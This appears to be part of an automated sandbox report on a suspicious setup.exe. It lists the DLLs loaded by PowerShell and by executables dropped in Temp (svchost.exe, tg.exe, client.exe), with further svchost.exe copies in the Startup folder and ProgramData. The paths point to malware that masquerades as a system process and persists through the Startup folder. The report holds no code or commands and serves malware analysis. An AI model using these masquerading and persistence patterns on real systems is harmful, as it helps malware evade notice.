        Source: C:\Users\user\Desktop\setup.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: winmmbase.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: winmmbase.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: slc.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: dxgidebug.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: riched20.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: usp10.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: msls31.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: windowscodecs.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: slc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: pcacli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\tg.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\tg.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\tg.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\tg.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\tg.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\tg.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\tg.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\tg.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\tg.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\tg.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\tg.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\tg.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\tg.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\tg.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\tg.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\tg.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\tg.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\tg.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\tg.exeSection loaded: slc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\tg.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\tg.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\tg.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\tg.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\tg.exeSection loaded: pcacli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\tg.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\tg.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeSection loaded: wldp.dllJump to behavior
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeSection loaded: profapi.dllJump to behavior
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\ProgramData\svchost\svchost.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\ProgramData\svchost\svchost.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: d3d9.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: cscapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: wtsapi32.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: winsta.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: dataexchange.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: d3d11.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: dcomp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: dxgi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: twinapi.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: d3d10_1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: d3d10_1core.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: d3d10_1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: d3d10_1core.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: resourcepolicyclient.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: dxcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: windowscodecs.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: d2d1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: dwrite.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\client.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
